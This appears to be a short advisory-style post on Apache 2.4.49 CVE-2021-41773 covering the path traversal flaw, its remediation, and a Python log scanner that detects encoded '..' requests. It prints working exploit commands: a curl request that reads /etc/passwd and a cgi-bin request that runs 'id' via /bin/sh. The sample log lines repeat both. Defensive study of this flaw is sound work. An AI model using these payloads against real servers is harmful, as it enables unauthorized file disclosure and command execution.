Apache HTTP Server, Path Traversal and Remote Code Execution, CVE-2021-41773 (Critical)

How the mentioned CVE works:

A flaw was introduced in Apache HTTP Server 2.4.49 by a change to the path normalization algorithm. The new code could incorrectly normalize a request URL containing an encoded path traversal sequence, for example `/icons/.%%32%65`. If files outside the document root were not protected by the `Require all denied` directive, such a request could map to a file system location beyond the expected directory, allowing an attacker to view arbitrary files. Furthermore, if CGI scripts were enabled for an aliased path, the flaw could be leveraged for remote code execution: a crafted request could escape the document root and execute a system command by passing the traversal sequence to a CGI script.
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical

date: 2021-10-05

Prediction: Patch expected 2021-10-07

What Undercode Says:

`$ curl http://localhost:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd`
`$ grep -A5 -B5 "Require all denied" /etc/apache2/sites-available/000-default.conf`

Exploit:

`curl "http://target/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo; id"`

Protection from this CVE:

Update to version 2.4.50.

Ensure `Require all denied` is set for directories outside the document root.

Disable CGI scripts if not required.
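
A log check for the encoded traversal described above, as an added example that is not part of the original post: it percent-decodes each request path until it stops changing, then flags any path whose decoded form contains a `..` segment. The log lines are constructed samples, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Request line and status inside an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable so nested encodings (%%32%65 -> %2e -> .) collapse."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def has_dotdot(path):
    """True if any whole path segment is '..' (a name like 'a..b' does not count)."""
    return ".." in path.split("/")

def classify(line):
    """Return None for a clean line, else a dict describing the traversal attempt."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]  # drop the query string
    decoded = fully_decode(raw)
    if not has_dotdot(decoded):
        return None
    return {
        "decoded_path": decoded,
        "encoded_dots": not has_dotdot(raw),      # '..' only appears after decoding
        "cgi_path": raw.startswith("/cgi-bin/"),  # the RCE variant goes through CGI
        "served": m["status"] == "200",           # 200 means the server answered it
    }

# Constructed sample log lines (documentation IP ranges, not captured traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2021:10:00:01 +0000] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.7 - - [05/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 403 199',
    '198.51.100.4 - - [05/Oct/2021:10:00:03 +0000] "GET /icons/apache_pb.png HTTP/1.1" 200 2326',
    '198.51.100.4 - - [05/Oct/2021:10:00:04 +0000] "GET /files/report%2e%2epdf HTTP/1.1" 200 512',
]

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

A flagged line with `served` set is the one to investigate first, since the server returned content for a path that decoded to a location above the alias.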

Impact:

Arbitrary file disclosure.

Remote Code Execution.

Sources:

Reported By: nvd.nist.gov